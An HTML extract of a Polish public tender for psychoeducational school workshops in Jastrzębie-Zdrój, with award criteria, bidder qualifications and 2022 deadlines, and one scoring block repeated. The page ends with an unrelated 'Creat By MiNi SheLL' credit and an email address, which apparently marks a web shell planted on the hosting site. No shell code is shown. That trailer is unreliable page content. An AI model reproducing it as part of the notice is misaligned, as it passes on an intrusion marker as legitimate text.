pkt<br/>d)	Wykonawca w przeciągu ostatnich dwóch lat odbył 2 szkolenia/warsztaty/konferencje/ seminaria: 10 pkt<br/>e)	Wykonawca w przeciągu ostatnich dwóch lat nie odbył żadnego szkolenia/warsztatu/konferencji/seminaria : 0 pkt<br/>Osoba skierowana do realizacji zamówienia w tym kryterium może uzyskać maksymalnie 40 punktów.<br/>5. Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą ilość punktów OLP.<br/>6. Wyliczenie punktów zostanie dokonane z dokładnością do 2 miejsc po przecinku, zgodnie<br/>z matematycznymi zasadami zaokrąglania.<br/>7. Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego<br/>Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz<br/>wspólnotowego nabycia usług, Zamawiający, w celu oceny takiej oferty, doliczy do przedstawionej<br/>w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi<br/>przepisami.<br/>8. Przy sprawdzaniu, ocenie i porównaniu ofert Zamawiający może żądać od Wykonawców<br/>wyjaśnień, dotyczących treści złożonych ofert.<br/>9. Niedopuszczalne jest prowadzenie między Zamawiającym a Wykonawcą negocjacji<br/>dotyczących złożonej oferty oraz dokonywanie jakiejkolwiek zmiany w treści oferty, z zastrzeżeniem<br/>możliwości poprawy oczywistych omyłek pisarskich, omyłek rachunkowych i innych omyłek<br/>polegających na niezgodności oferty z ogłoszeniem, niepowodujących istotnych zmian w treści<br/>oferty.<br/>10. W przypadku złożenia ofert o tej samej cenie, Zamawiający ma prawo do wezwania<br/>wykonawców do złożenia ofert dodatkowych w wyznaczonym przez siebie terminie i udziela<br/>zamówienia temu Wykonawcy, który zaoferuje niższą cenę. Niedopuszczalne jest zaoferowanie cen<br/>wyższych niż w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć II- Warsztaty dla dzieci i młodzieży szkół podstawowych i ponadpodstawowych. Liczba 18 grup po 12 osób w szkołach podstawowych i ponadpodstawowych na terenie Miasta Jastrzębie- Zdrój. Cykl 5 spotkań trwających 2 godziny zegarowe każde. Maksymalna ilość godzin do przepracowania 180h do końca trwania umowy. Zamawiający zastrzega sobie prawo do możliwości zmniejszenia ilości grup w zależności od zapotrzebowania wybranych placówek.<br/>Celem warsztatów jest: profilaktyka i pomoc dzieciom i młodzieży w przezwyciężaniu trudności i problemów z którymi się borykają. Zajęcia mają na celu zapobieganie alienacji, depresji, zagrożeniom suicydalnym, wypracowanie podstawowych umiejętności rozpoznawania takich objawów, odpowiedniej reakcji na nie, przeciwdziałanie hejtowaniu wśród młodzieży oraz zagrożeniom związanym z uzależnieniami. Warsztaty wskażą również miejsca, gdzie dzieci i młodzież może zwrócić się o pomoc oraz podniosą kompetencje społeczne uczestników.<br/>Poruszana tematyka warsztatów:<br/>I. Depresja, samobójstwa, samookaleczenia, uzależnienia<br/>- mity, stereotypy, fakty<br/>- objawy (na co zwrócić uwagę)<br/>- czynniki ryzyka<br/>- czynniki chroniące<br/>- gdzie szukać pomocy dla siebie?<br/>- jak pomóc innym?<br/><br/>II. Konflikty z rówieśnikami i rodzicami<br/>- rozróżnienie między zjawiskiem konfliktu a przemocy<br/>- mity, stereotypy, fakty na temat przemocy<br/>- objawy (na co zwrócić uwagę)<br/>- czynniki ryzyka<br/>- czynniki chroniące<br/>- gdzie szukać pomocy dla siebie?<br/>- jak pomóc innym?<br/>- wzmacnianie umiejętności interpersonalnych – konstruktywne metody rozwiązywania konfliktów<br/>- asertywność i stawianie granic<br/><br/>2. Do obowiązków trenera należeć będzie, w szczególności (dla części I i II):<br/>1) Przeprowadzenie warsztatów (spotkań edukacyjno-profilaktycznych) dla wskazanych Uczestników<br/>o wskazanym zakresie przedmiotowym (przykładowe konspekty warsztatów zostaną przekazane<br/>przez Wykonawcę).<br/>2) Opracowanie programu warsztatów bądź aktualizacji programu i dostosowania go do grupy<br/>na podstawie wytycznych dostarczonych przez Zamawiającego.<br/>3) Doręczenie Uczestnikom warsztatów materiałów edukacyjnych przekazanych przez<br/>Zamawiającego.<br/>4) Prowadzenie dokumentacji realizacji umowy na wzorach dostarczonych przez Zamawiającego<br/>i przekazanie całej dokumentacji Zamawiającemu:<br/> prowadzenie sprawozdań ze zrealizowanych warsztatów zawierających informacje:<br/>o dacie i godzinach warsztatów, tematyce, grupie docelowej, liczbie zrealizowanych godzin,<br/> zebranie od instytucji, w których prowadzone są warsztaty, podpisanych potwierdzeń<br/>zrealizowanych warsztatów dla konkretnej grupy uczestników (rejestr warsztatów).<br/>5) Zapewnienie aktywnego zaangażowania Uczestników w trakcie warsztatów.<br/>6) Wykonawca zobowiązany jest do sporządzania dokumentacji fotograficznej z przebiegu każdych warsztatów.<br/>Wykonanie dokumentacji zdjęciowej to minimum 5 zdjęć ze spotkania, w formacie jpg., przy czym<br/>fotografie powinny być wykonywane w taki sposób, aby wszelkie wizerunki osób na fotografiach<br/>stanowiły jedynie tło bądź element szerszej całości. Zdjęcia powinny być porównywalnej wielkości.<br/>Wykonawca będzie zobowiązany do dostarczenia Zamawiającemu, na wskazany adres e-mail, pliku zdjęć w terminie 7 dni od zakończenia realizacji warsztatu z protokołem, po którego zatwierdzeniu<br/>Wykonawca będzie upoważniony do wystawienia rachunku/faktury.<br/><br/>3. Pozostałe obowiązki Wykonawcy (dla części I i II):<br/>1) Realizowanie usługi w sposób staranny, skuteczny i terminowy, zgodnie z ustalonym harmonogramem realizacji usługi;<br/>2) Ewidencjonowanie wykonanych godzin pracy;<br/>3) Utrzymywanie stałego kontaktu z Zamawiającym, w tym bieżące informowanie o wszystkich<br/>zaistniałych problemach;<br/>4) Przestrzeganie obowiązków wynikających z realizacji umowy, przepisów prawnych, procedur,<br/>standardów oraz innych obowiązujących dokumentów;<br/>5) Odpowiadanie na ewentualne pytania w przypadku kontroli realizacji zadania przez instytucje<br/>zewnętrzne bądź Zamawiającego;<br/><br/>4. Do obowiązków Zamawiającego należeć będzie:<br/>1) udostępnienie Wykonawcy wszelkich informacji i dokumentów będących w jego posiadaniu,<br/>niezbędnych do prawidłowej realizacji przedmiotu umowy,<br/>2) ustalenie z Wykonawcą szczegółowego harmonogramu realizacji usługi, konkretnych terminów oraz liczby i rodzaju grup uczestników, dla których Wykonawca przeprowadzi usługę,<br/>3) rekrutacja uczestników na warsztaty,<br/>4) zapewnienie miejsca – sal zajęciowych do realizacji warsztatów, a także podstawowych materiałów warsztatowych (bloki flipchart, markery, kartki, karteczki samoprzylepne, wydrukowane materiały i dokumenty) potrzebnych do przeprowadzenia warsztatów.<br/>5. Wybrany Wykonawca zobowiązuje się w toku realizacji umowy do bezwzględnego stosowania wytycznych horyzontalnych, wytycznych programowych oraz Wytycznych w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014–2020.<br/>6. Warsztaty dla uczennic (część I) odbywać się będą w wybrane dni powszednie od poniedziałku do piątku w godz. 8-16 w szkołach podstawowych z terenu Miasta Jastrzębie-Zdrój, warsztaty dla dzieci i młodzieży (część II) odbywać się będą w wybrane dni powszednie od poniedziałku do piątku w godz. 8-16 , w szkołach podstawowych i ponadpodstawowych z terenu Miasta Jastrzębie-Zdrój.<br/>7. Przedmiot zamówienia realizowany jest w ramach projektu „Jastrzębie –Zdrój Miasto-Rodziny&#34;, którego celem jest wzrost dostępności i jakości usług społecznych na terenie Miasta Jastrzębie- Zdrój mających na celu wsparcie na rzecz dzieci i rodziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>Cena 60 pkt<br/>Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia 40 pkt<br/>Razem 100 pkt<br/>2. W przypadku, gdy do postępowania złożona zostanie tylko jedna oferta niepodlegająca<br/>odrzuceniu, otrzyma ona maksymalną liczbę punktów, równą 100 pkt.<br/>3. W przypadku, gdy do postępowania złożone zostaną co najmniej dwie oferty niepodlegające<br/>odrzuceniu, punkty przyznane danej ofercie zostaną obliczone wg poniższego wzoru:<br/>OLP = C + A<br/>gdzie:<br/>C – ilość punktów uzyskanych w kryterium „cena”.<br/>A – ilość punktów uzyskanych w kryterium „Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia”<br/>4. Zasady przydzielania punktów za poszczególne kryteria są następujące<br/>A.	Kryterium: Cena – C<br/>1) Cena (cena jednostkowa zł za godzinę )- 60 pkt<br/>C= (Najniższa cena jednostkowa / Cena jednostkowa badanej oferty) x 60 pkt<br/>B.	Kryterium „Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia”- Punktacji podlegać będzie posiadanie dodatkowo szkoleń/warsztatów/konferencji/ seminariów potwierdzonych certyfikatem ukończenia w okresie ostatnich dwóch lat : A- 40 pkt<br/>a)	Wykonawca w przeciągu ostatnich dwóch lat odbył 5 i więcej szkoleń/warsztatów/konferencji/ seminariów : 40 pkt<br/>b)	Wykonawca w przeciągu ostatnich dwóch lat odbył 4 szkolenia/warsztaty/konferencje/ seminaria: 30 pkt<br/>c)	Wykonawca w przeciągu ostatnich dwóch lat odbył 3 szkolenia/warsztaty/konferencje/ seminaria: 20 pkt<br/>d)	Wykonawca w przeciągu ostatnich dwóch lat odbył 2 szkolenia/warsztaty/konferencje/ seminaria: 10 pkt<br/>e)	Wykonawca w przeciągu ostatnich dwóch lat nie odbył żadnego szkolenia/warsztatu/konferencji/seminaria : 0 pkt<br/>Osoba skierowana do realizacji zamówienia w tym kryterium może uzyskać maksymalnie 40 punktów.<br/>5. Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą ilość punktów OLP.<br/>6. Wyliczenie punktów zostanie dokonane z dokładnością do 2 miejsc po przecinku, zgodnie<br/>z matematycznymi zasadami zaokrąglania.<br/>7. Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego<br/>Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz<br/>wspólnotowego nabycia usług, Zamawiający, w celu oceny takiej oferty, doliczy do przedstawionej<br/>w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi<br/>przepisami.<br/>8. Przy sprawdzaniu, ocenie i porównaniu ofert Zamawiający może żądać od Wykonawców<br/>wyjaśnień, dotyczących treści złożonych ofert.<br/>9. Niedopuszczalne jest prowadzenie między Zamawiającym a Wykonawcą negocjacji<br/>dotyczących złożonej oferty oraz dokonywanie jakiejkolwiek zmiany w treści oferty, z zastrzeżeniem<br/>możliwości poprawy oczywistych omyłek pisarskich, omyłek rachunkowych i innych omyłek<br/>polegających na niezgodności oferty z ogłoszeniem, niepowodujących istotnych zmian w treści<br/>oferty.<br/>10. W przypadku złożenia ofert o tej samej cenie, Zamawiający ma prawo do wezwania<br/>wykonawców do złożenia ofert dodatkowych w wyznaczonym przez siebie terminie i udziela<br/>zamówienia temu Wykonawcy, który zaoferuje niższą cenę. Niedopuszczalne jest zaoferowanie cen<br/>wyższych niż w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w poniższym pkt 2. oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w:<br/>a) art. 108 ust. 1 ustawy Pzp,<br/>b) art. 109 ust. 1 pkt 5, 7, 8 ustawy Pzp.<br/>3. Wykluczenie Wykonawcy następuje zgodnie z art. 111 ustawy Pzp.<br/>4. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą, którą skieruje do realizacji zamówienia, posiadającą:<br/>- wykształcenie wyższe na jednym z wymienionych kierunków: psychologia, pedagogika, socjologia bądź wykształcenie medyczne o specjalizacji psychiatria,<br/>- doświadczenie w realizowaniu warsztatów psychoedukacyjnych z zakresu kompetencji społecznych i/lub tematyki zdrowia psychicznego dla uczniów szkół podstawowych lub ponadpodstawowych– łącznie min. 75 godzin warsztatowych,<br/><br/>- co najmniej 2 lata doświadczenia w pracy grupowej z dziećmi i/lub młodzieżą.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania- zgodnie z załącznikiem nr 2 do SWZ.<br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.	Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>a)	Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą, którą skieruje do realizacji zamówienia, posiadającą:<br/>- wykształcenie wyższe na jednym z wymienionych kierunków: psychologia, pedagogika, socjologia bądź wykształcenie medyczne o specjalizacji psychiatria,<br/>b)	doświadczenie w realizowaniu warsztatów psychoedukacyjnych z zakresu kompetencji społecznych i/lub tematyki zdrowia psychicznego dla uczniów szkół podstawowych lub ponadpodstawowych– łącznie min. 75 godzin warsztatowych,<br/>c)	co najmniej 2 lata doświadczenia w pracy grupowej z dziećmi i/lub młodzieżą.<br/>5.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p dane umożliwiające dostęp do tych środków;<br/>2)	podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>7. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokument6w składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczeg6lnosci przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>8. Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego o ochronie konkurencji i konsumentów- zgodnie z załącznikiem nr 4 do SWZ.<br/>9. Do oferty Wykonawca jest zobowiązany dołączyć oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 7 ust.1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022r. poz. 835)- zgodnie z załącznikiem nr 7 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 8 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p oraz wskazanym we wzorze umowy.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/><br/><br/>5.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają formy pisemnej pod rygorem nieważności. Zamawiający poza możliwością zmiany na podstawie art. 455 ustawy Pzp, przewiduje również możliwość dokonania zmiany postanowień umowy w następujących przypadkach:<br/>1)	zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku nieprzewidzianych zdarzeń losowych między innymi takich jak: śmierć, choroba, ustanie stosunku pracy, utrata uprawnień, inne uzasadnione okoliczności niepozwalające wykonywać wskazanej osobie powierzonych czynności pod warunkiem, że osoby zaproponowane będą posiadały minimum takie kwalifikacje jakie Wykonawca wymagał w warunkach udziału w postępowaniu;<br/>2)	zmiany terminu realizacji przedmiotu umowy, na uzasadniony wniosek Wykonawcy i pod warunkiem, że zmiana ta wynika z okoliczności których wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona, w szczególności gdy jest spowodowana: zawieszeniem realizacji umowy w okresie obowiązywania umowy w przypadku zamknięcia placówki z powodu pandemii COVID-19 bądź innego nieprzewidzianego zdarzenia losowego. <br/>3)	zmiany okresu rozliczenia i płatności ostatniego miesiąca obowiązywania umowy.<br/>2.	Zmiany w punktach 1-3 powyżej wymagają wyrażenia zgody przez Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty dostępnego na miniPortalu. Formularz do zaszyfrowania oferty przez Wykonawcę jest dostępny dla Wykonawców na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-12 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com